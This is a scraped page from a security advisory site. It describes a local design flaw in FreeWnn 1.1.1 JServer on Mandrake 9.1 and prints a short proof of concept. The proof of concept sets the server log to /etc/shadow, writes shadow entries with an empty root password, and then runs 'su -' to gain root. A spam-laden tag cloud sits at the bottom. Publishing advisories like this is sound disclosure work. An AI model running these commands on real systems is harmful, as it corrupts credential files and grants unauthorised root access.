about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , FreeWnn JServer Logging Option Data Corruption Vulnerability


Title FreeWnn JServer Logging Option Data Corruption Vulnerability
Published 2003-06-14-12:00AM
Updated 2003-06-14-07:48PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery of this vulnerability credited to Stefano Di Paola <st0r1e@libero.it>.
Vulnerable  FreeWnn FreeWnn 1.1.1
MandrakeSoft Linux Mandrake 9.1
Not Vulnerable  
Code   The following proof of concept was provided:

$>/usr/bin/Wnn4/jserver -s /etc/shadow
$>/usr/bin/Wnn4/wddel -D localhost -n '
> root::12146:0:99999:7:::
> bin:*:12146:0:99999:7:::
> daemon:*:12146:0:99999:7:::
> adm:*:12146:0:99999:7:::
> lp:*:12146:0:99999:7:::
> sync:*:12146:0:99999:7:::
> shutdown:*:12146:0:99999:7:::
> halt:*:12146:0:99999:7:::
> ' -d 123
$>su -
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 19:47:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo+Remo lo983l FlashChat+ Www.XXX gi Hot+photos AIX exploi free downl meiliren19 jPORTAL 2 CMS is Fre 200 /compo php-nuke 2 buy online superstack crack+data Www play b www.b+f.co +drftpd 2404.qcqc. absolute php-nuke+2 www.kergk. Suni www.trisha lasputas.t ip board 2 a...oolbar Www play b Nude pictu www.ynxxfw Www.Sex gi Crack D/r/ Www.pinkwa CMS is Fre sxeyhot www.dianna SexyPics www.sexy.p sleep fuck www.kaixin pro ftpd 1 divo gills CMS is Fre phpbb 2.0. top PHP t334t video porn fighting m GYQ2000639 rx bot